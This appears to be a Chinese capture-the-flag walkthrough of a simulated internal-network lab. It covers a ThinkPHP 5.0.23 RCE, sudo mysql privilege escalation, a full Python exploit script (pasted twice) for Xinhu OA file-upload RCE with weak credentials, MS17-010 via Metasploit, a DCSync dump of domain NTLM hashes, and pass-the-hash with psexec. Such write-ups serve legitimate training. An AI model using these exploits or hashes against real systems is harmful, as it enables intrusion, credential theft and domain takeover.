Initial

靶标介绍：

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

入口：fscan扫描端口

结果：

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.227.140   is alive
[*] Icmp alive hosts len is: 1
39.98.227.140:22 open
39.98.227.140:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.98.227.140      code:200 len:5578   title:Bootstrap Material Admin
[+] http://39.98.227.140 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 13.9123559s

存在thinkphp5.0.23RCE漏洞，直接打并写马

内网扫描结果：

172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.2:139 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
[+] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[+] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] WebTitle:http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] 172.22.1.21          XIAORANG\XIAORANG-WIN7     Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] 172.22.1.2     [+]DC XIAORANG\DC01              Windows Server 2016 Datacenter 14393
[*] 172.22.1.18          XIAORANG\XIAORANG-OA01     Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统

第一台机子需要提权，先查看suid：find / -user root -perm /4000 2>/dev/null

发现有sudo，查看sudo -l，有mysql no pass root运行

直接mysql提权：sudo mysql -e '\! cmd'

sudo mysql -e '\! find / -name flag'

sudo mysql -e '\! cat /root/flag/flag01.txt'

得到第一部分flag

信呼OA系统弱口令：admin/admin123

然后信呼oa也有rce：

EXP:

import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)

上马后在C:/Users/Administrator/flag/找到第二段flag

172.22.1.21存在ms17010，直接打

search ms17
use 0
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
exploit -j

上线后kiwi打dcsync

session -1
use kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

得到

502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1000    DC01$   c4459ccfe941bc3a1835c72070324266        532480
1104    XIAORANG-OA01$  7d89a53f96224552d90bcc58cc6c6711        4096
1108    XIAORANG-WIN7$  e41d4ce40648363b3cae0236d902260a        4096

打dc的哈希传递即可拿最后一段flag

proxychains4 psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codec gbk